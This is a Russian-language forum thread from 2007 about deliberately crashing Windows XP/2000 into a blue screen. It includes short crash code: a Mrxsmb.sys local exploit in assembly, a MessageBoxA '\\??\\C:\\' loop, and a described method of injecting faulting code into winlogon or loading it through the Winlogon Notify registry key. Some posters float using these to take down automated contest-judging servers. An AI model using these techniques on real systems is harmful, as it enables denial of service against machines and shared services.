Вызвать синий экран

Тема в разделе "WASM.BEGINNERS", создана пользователем x3r0n, 23 янв 2007.

  1. koderr

    koderr New Member

    Публикаций:
    0
    Регистрация:
    29 сен 2006
    Сообщения:
    205
    Mrxsmb.sys XP & 2K Ring0 Exploit (6/12/2005)
    Валит все подряд, даже под гостем :) Элементарный код -
    Код (Text):
    1. 998712
     
  2. Twister

    Twister New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2005
    Сообщения:
    720
    Адрес:
    Алматы
    К сожалению, нет возможности проверить, но говорят, что этот код тоже роняет винду, причем, из под любого аккакунта, достаточно пару раз нажать OK.
    Код (Text):
    1. char bug [] = "\\??\\C:\\";
    2. for(int i = 0; i < 10; i ++)
    3. {
    4. MessageBoxA(0, bug, bug, MB_SERVICE_NOTIFICATION);
    5. }
    Взято от сюда...
     
  3. n0name

    n0name New Member

    Публикаций:
    0
    Регистрация:
    5 июн 2004
    Сообщения:
    4.336
    Адрес:
    Russia
    Лучше поставить i < 100
     
  4. halyavin

    halyavin New Member

    Публикаций:
    0
    Регистрация:
    13 май 2005
    Сообщения:
    252
    Адрес:
    Russia
    OioVologda
    GetDiBits прав админа для исполнения не надо. Можно все-таки по конкретнее версию 2000 винды не дома? Чисто для интереса.
    Twister
    Еще бы как-нибудь автоматически нажать ok в этом MessageBox... Иначе этот код не опасен для олимпиадных автоматических систем проверки решений.
    koderr
    А чему это в асме соотвествует? Не люблю в машинных кодах писать...
     
  5. koderr

    koderr New Member

    Публикаций:
    0
    Регистрация:
    29 сен 2006
    Сообщения:
    205
    Код (Text):
    1. cdq
    2. xchg edx, [edx]
     
  6. Twister

    Twister New Member

    Публикаций:
    0
    Регистрация:
    12 окт 2005
    Сообщения:
    720
    Адрес:
    Алматы
    koderr
    Жаль что Mrxsmb.sys у меня отсутствует - так и не полюбовался я на синий экран... ;)
     
  7. halyavin

    halyavin New Member

    Публикаций:
    0
    Регистрация:
    13 май 2005
    Сообщения:
    252
    Адрес:
    Russia
    А что это за драйвер? У меня не вылетело... Драйвер такой есть, загружен или нет - не знаю.
     
  8. Atlantic

    Atlantic Member

    Публикаций:
    0
    Регистрация:
    22 июн 2005
    Сообщения:
    322
    Адрес:
    Швеция
    halyavin
    Посмотри сюда. Еще как опасен, пока M$ не выпустит заплатку.
     
  9. x3r0n

    x3r0n New Member

    Публикаций:
    0
    Регистрация:
    24 ноя 2006
    Сообщения:
    34
    Нашел подходящее для меня решение...
    Спасибо всем!
     
  10. hTrader

    hTrader Сергей

    Публикаций:
    0
    Регистрация:
    26 дек 2006
    Сообщения:
    150
    Адрес:
    ОПИА
    Так ты у нас злоуышленник-хаккер?
     
  11. OioVologda

    OioVologda New Member

    Публикаций:
    0
    Регистрация:
    21 ноя 2006
    Сообщения:
    91
    так вы че тут люди хотите сервачину, которая решения проверяет завалить чтоли?
     
  12. PaCHER

    PaCHER New Member

    Публикаций:
    0
    Регистрация:
    25 мар 2006
    Сообщения:
    852
    У когонибудь хоть сработало?
    У меня 0 на массу
     
  13. W4FhLF

    W4FhLF New Member

    Публикаций:
    0
    Регистрация:
    3 дек 2006
    Сообщения:
    1.050
    PaCHER

    Срабатывает на XP Sp1-2
     
  14. koderr

    koderr New Member

    Публикаций:
    0
    Регистрация:
    29 сен 2006
    Сообщения:
    205
    А еще можно вместо MB_SERVICE_NOTIFICATION поставить 0xDEADC0DE :P
     
  15. varnie

    varnie New Member

    Публикаций:
    0
    Регистрация:
    2 янв 2005
    Сообщения:
    1.785
    OioVologda,
    а это идея! :)
     
  16. OioVologda

    OioVologda New Member

    Публикаций:
    0
    Регистрация:
    21 ноя 2006
    Сообщения:
    91
    Хорошие вещи пашут олько из под ринг0. Из под ринг 3 ничего не добиться. Конечно есть примеры ламерности мелкомягких типа getdibits (кстати не работает на лицензионной 2000 винде про. sp4. точно версию не помню), или вот charbug. Все это конечно хорошо, но бесполезно. Ну завалите сервак, ну поднимут его рукастые админы в пол минуты, ну и в конце концов полетите вы с этой олимпиады куда подальше. (сорри за офтоп)
     
  17. halyavin

    halyavin New Member

    Публикаций:
    0
    Регистрация:
    13 май 2005
    Сообщения:
    252
    Адрес:
    Russia
    А если это олимпиада через интернет? Тогда сорвать такую олимпиаду сможет любой желающий.
     
  18. OioVologda

    OioVologda New Member

    Публикаций:
    0
    Регистрация:
    21 ноя 2006
    Сообщения:
    91
    Блин, какой дурень добровольно будет закачивать черт-знает чей код на свой сервак и там выполнять? Олимпиады через интернет, если конечно организованы не идиотами, явно построены на других принципах.
     
  19. mix_mix

    mix_mix Михаил

    Публикаций:
    0
    Регистрация:
    8 окт 2005
    Сообщения:
    277
    Адрес:
    Токио
    Блин, народ сабж уже не раз обсуждался на васме, причем я же и писал как это сделать:
    открываетет процесс винлогона, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread
    Записываемый код: любые инструкции, вызывающее исключение, например hlt.
    Все, синий экран обеспечен. Ну или на крайняк подгружаем винлогоном при старте библиотеку
    HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
    и там генерируем исключение. XP SP2 последний вариант рабоатет 100%
     
  20. PaCHER

    PaCHER New Member

    Публикаций:
    0
    Регистрация:
    25 мар 2006
    Сообщения:
    852
    W4FhLF
    Скинте чтоль скомпиленый вариант куданить. У меня на 3ёх системах 0 на массу.
    Все как в примере в 2ух языках пробовал болт :dntknw: